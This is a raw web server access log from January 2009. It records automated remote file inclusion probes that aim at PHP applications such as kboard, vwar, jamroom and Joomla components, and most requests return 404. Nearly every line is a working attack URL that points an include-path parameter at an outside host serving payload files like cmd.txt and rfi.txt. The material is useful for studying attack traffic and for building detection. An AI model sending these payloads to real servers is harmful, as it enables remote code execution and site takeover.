200.57.158.195 - - [13/Jan/2009:09:32:56 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
200.57.158.195 - - [13/Jan/2009:09:32:56 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.172.41.141 - - [13/Jan/2009:09:36:09 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
200.57.158.195 - - [13/Jan/2009:09:41:00 -0600] "GET /logs/access_log.1228867200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
194.30.13.134 - - [13/Jan/2009:09:45:52 -0600] "GET /logs////modules/vwar/admin/admin.php?vwar_root=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
194.30.13.134 - - [13/Jan/2009:09:45:52 -0600] "GET /logs////modules/vwar/admin/admin.php?vwar_root=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
194.30.13.134 - - [13/Jan/2009:09:45:53 -0600] "GET ////modules/vwar/admin/admin.php?vwar_root=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
194.30.13.134 - - [13/Jan/2009:09:45:53 -0600] "GET ////modules/vwar/admin/admin.php?vwar_root=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
206.225.91.21 - - [13/Jan/2009:09:54:21 -0600] "GET /logs//lostpasswd.php?env%5Binclude_prefix%5D=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
206.225.91.21 - - [13/Jan/2009:09:54:21 -0600] "GET //lostpasswd.php?env%5Binclude_prefix%5D=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
206.225.91.21 - - [13/Jan/2009:09:54:22 -0600] "GET /logs//lostpasswd.php?env%5Binclude_prefix%5D=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
206.225.91.21 - - [13/Jan/2009:09:54:22 -0600] "GET //lostpasswd.php?env%5Binclude_prefix%5D=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.153.214.235 - - [13/Jan/2009:09:57:09 -0600] "GET //lostpasswd.php?env%5Binclude_prefix%5D=http://www.grimesplace.com/cache/read.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.153.214.235 - - [13/Jan/2009:09:57:09 -0600] "GET /logs//lostpasswd.php?env%5Binclude_prefix%5D=http://www.grimesplace.com/cache/read.txt??%0D?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
69.16.234.228 - - [13/Jan/2009:10:29:02 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.eyepro.net/assets/snippets/reflect/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
69.16.234.228 - - [13/Jan/2009:10:29:02 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.eyepro.net/assets/snippets/reflect/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.16.234.228 - - [13/Jan/2009:10:29:02 -0600] "GET /logs/access_log.1227312000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.eyepro.net/assets/snippets/reflect/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.111.180.85 - - [13/Jan/2009:10:48:50 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/rfi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
89.111.180.85 - - [13/Jan/2009:10:48:50 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/rfi.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
83.222.23.232 - - [13/Jan/2009:10:50:34 -0600] "GET /logs//zb41/include/write.php?dir=http://kih0119k.realmind.net/bbs/data2/balloon/idcanal.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
83.222.23.232 - - [13/Jan/2009:10:50:35 -0600] "GET //zb41/include/write.php?dir=http://kih0119k.realmind.net/bbs/data2/balloon/idcanal.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.111.180.85 - - [13/Jan/2009:10:50:41 -0600] "GET /logs/access_log.1230422400//include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/scan.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.111.180.85 - - [13/Jan/2009:10:50:41 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/scan.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.111.180.85 - - [13/Jan/2009:10:50:41 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/scan.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.111.180.85 - - [13/Jan/2009:10:51:04 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/rfi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
89.111.180.85 - - [13/Jan/2009:10:51:07 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/ganyotz/rfi.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
84.21.71.133 - - [13/Jan/2009:10:58:11 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
84.21.71.133 - - [13/Jan/2009:10:58:11 -0600] "GET /logs/access_log.1229817600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
84.21.71.133 - - [13/Jan/2009:10:58:11 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
84.21.71.133 - - [13/Jan/2009:11:05:17 -0600] "GET /logs/access_log.1227312000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.78.85.87 - - [13/Jan/2009:11:14:26 -0600] "GET /logs///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.85.87 - - [13/Jan/2009:11:14:26 -0600] "GET ///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.85.87 - - [13/Jan/2009:11:14:26 -0600] "GET /logs/access_log.1228608000///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
148.245.102.115 - - [13/Jan/2009:11:15:01 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?%0D? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
148.245.102.115 - - [13/Jan/2009:11:15:01 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?%0D? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
148.245.102.115 - - [13/Jan/2009:11:15:01 -0600] "GET /logs/access_log.1227312000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tridipanel.com/id.txt?%0D? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.35.82.155 - - [13/Jan/2009:11:27:57 -0600] "GET //include/bbs.lib.inc.php?site_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
195.35.82.155 - - [13/Jan/2009:11:27:57 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
77.221.130.14 - - [13/Jan/2009:11:28:53 -0600] "GET ///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
77.221.130.14 - - [13/Jan/2009:11:28:56 -0600] "GET /logs///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.14 - - [13/Jan/2009:11:28:56 -0600] "GET /logs/access_log.1228608000///admin/admin.php?_shop_path=http://bugdork.net23.net/fx29id??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.9.22.160 - - [13/Jan/2009:11:30:10 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://godswordaudio.com/modules/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.9.22.160 - - [13/Jan/2009:11:30:10 -0600] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://godswordaudio.com/modules/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.9.22.160 - - [13/Jan/2009:11:30:10 -0600] "GET //include/bbs.lib.inc.php?site_path=http://godswordaudio.com/modules/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
124.105.248.66 - - [13/Jan/2009:11:30:27 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
124.105.248.66 - - [13/Jan/2009:11:30:30 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
209.172.41.138 - - [13/Jan/2009:11:32:41 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.172.41.138 - - [13/Jan/2009:11:32:41 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.172.41.138 - - [13/Jan/2009:11:32:41 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:35:28 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:35:28 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:35:28 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.225.211.132 - - [13/Jan/2009:11:35:44 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.820"
66.225.211.132 - - [13/Jan/2009:11:35:44 -0600] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.820"
67.76.163.60 - - [13/Jan/2009:11:35:51 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:35:51 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:35:51 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:40:51 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:40:52 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.76.163.60 - - [13/Jan/2009:11:40:53 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.22.110.198 - - [13/Jan/2009:11:41:49 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.22.110.198 - - [13/Jan/2009:11:41:49 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
85.25.152.167 - - [13/Jan/2009:11:45:35 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.25.152.167 - - [13/Jan/2009:11:45:35 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.35.82.155 - - [13/Jan/2009:11:45:50 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
195.35.82.155 - - [13/Jan/2009:11:45:50 -0600] "GET //include/bbs.lib.inc.php?site_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
211.202.2.220 - - [13/Jan/2009:11:46:00 -0600] "GET //tools/send_reminders.php?noSet=0&includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.202.2.220 - - [13/Jan/2009:11:46:01 -0600] "GET /logs/access_log.1229817600//tools/send_reminders.php?noSet=0&includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.202.2.220 - - [13/Jan/2009:11:46:03 -0600] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
81.208.9.229 - - [13/Jan/2009:11:47:03 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
81.208.9.229 - - [13/Jan/2009:11:47:09 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.208.9.229 - - [13/Jan/2009:11:48:38 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
81.208.9.229 - - [13/Jan/2009:11:48:43 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
80.93.220.183 - - [13/Jan/2009:11:50:35 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
80.93.220.183 - - [13/Jan/2009:11:50:36 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
209.172.41.138 - - [13/Jan/2009:11:54:24 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.67.30.158 - - [13/Jan/2009:12:09:20 -0600] "GET /logs//board//board/include/bbs.lib.inc.php=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.808"
80.67.30.158 - - [13/Jan/2009:12:09:20 -0600] "GET //board//board/include/bbs.lib.inc.php=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.808"
124.105.248.66 - - [13/Jan/2009:12:10:22 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
124.105.248.66 - - [13/Jan/2009:12:10:33 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
85.9.22.160 - - [13/Jan/2009:12:14:38 -0600] "GET /errors.php?error=http://godswordaudio.com/modules/id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.9.22.160 - - [13/Jan/2009:12:14:38 -0600] "GET /logs/errors.php?error=http://godswordaudio.com/modules/id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.9.22.160 - - [13/Jan/2009:12:14:38 -0600] "GET /logs/access_log.1228521600/errors.php?error=http://godswordaudio.com/modules/id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.9.22.160 - - [13/Jan/2009:12:15:01 -0600] "GET /logs/access_log.1227657600/errors.php?error=http://godswordaudio.com/modules/id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
200.52.67.178 - - [13/Jan/2009:12:29:50 -0600] "GET //index.php?cct_base=http://blog.3s.com.ua/im/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
87.106.102.198 - - [13/Jan/2009:12:32:43 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.106.102.198 - - [13/Jan/2009:12:32:43 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
64.119.182.47 - - [13/Jan/2009:12:44:34 -0600] "GET /logs/access_log.1229040000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/readme.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.119.182.47 - - [13/Jan/2009:12:44:34 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/readme.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.119.182.47 - - [13/Jan/2009:12:44:34 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/readme.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.246.22.94 - - [13/Jan/2009:12:45:34 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
64.246.22.94 - - [13/Jan/2009:12:45:34 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
64.119.182.47 - - [13/Jan/2009:12:45:57 -0600] "GET /logs/access_log.1229126400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/readme.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
88.84.146.23 - - [13/Jan/2009:12:53:24 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gspdesigns.com/rms//tpl/doc/header.jpg? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
88.84.146.23 - - [13/Jan/2009:12:53:24 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gspdesigns.com/rms//tpl/doc/header.jpg? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.218.85.18 - - [13/Jan/2009:13:27:27 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.218.85.18 - - [13/Jan/2009:13:27:27 -0600] "GET //include/bbs.lib.inc.php?site_path=http://h1.ripway.com/sampurna/kambe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.73.151.5 - - [13/Jan/2009:13:34:47 -0600] "GET ////////?cmd&file=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 3251 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
69.73.151.5 - - [13/Jan/2009:13:34:48 -0600] "GET /logs/access_log.1230076800////////?cmd&file=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
69.73.151.5 - - [13/Jan/2009:13:34:48 -0600] "GET /logs////////?cmd&file=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 173933 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
221.139.49.87 - - [13/Jan/2009:13:37:16 -0600] "GET //appserv/main.php?appserv_root=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
221.139.49.87 - - [13/Jan/2009:13:37:16 -0600] "GET /logs//appserv/main.php?appserv_root=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
221.139.49.87 - - [13/Jan/2009:13:37:16 -0600] "GET /logs/access_log.1230422400//appserv/main.php?appserv_root=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
221.139.49.87 - - [13/Jan/2009:13:44:59 -0600] "GET /logs/access_log.1229817600//appserv/main.php?appserv_root=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.237.201 - - [13/Jan/2009:13:48:50 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thepotc.ru//modules/coppermine/albums/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
85.17.237.201 - - [13/Jan/2009:13:48:50 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thepotc.ru//modules/coppermine/albums/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
85.17.237.201 - - [13/Jan/2009:13:48:51 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thepotc.ru//modules/coppermine/albums/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
85.17.237.201 - - [13/Jan/2009:13:48:51 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thepotc.ru//modules/coppermine/albums/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
189.54.249.148 - - [13/Jan/2009:13:56:52 -0600] "GET /logs//include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:13:56:52 -0600] "GET /logs//include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:13:56:53 -0600] "GET //include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:13:56:53 -0600] "GET //include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
85.17.237.201 - - [13/Jan/2009:13:56:56 -0600] "GET /logs/access_log.1229817600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=? HTTP/1.1" 404 364 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.17.237.201 - - [13/Jan/2009:13:56:56 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
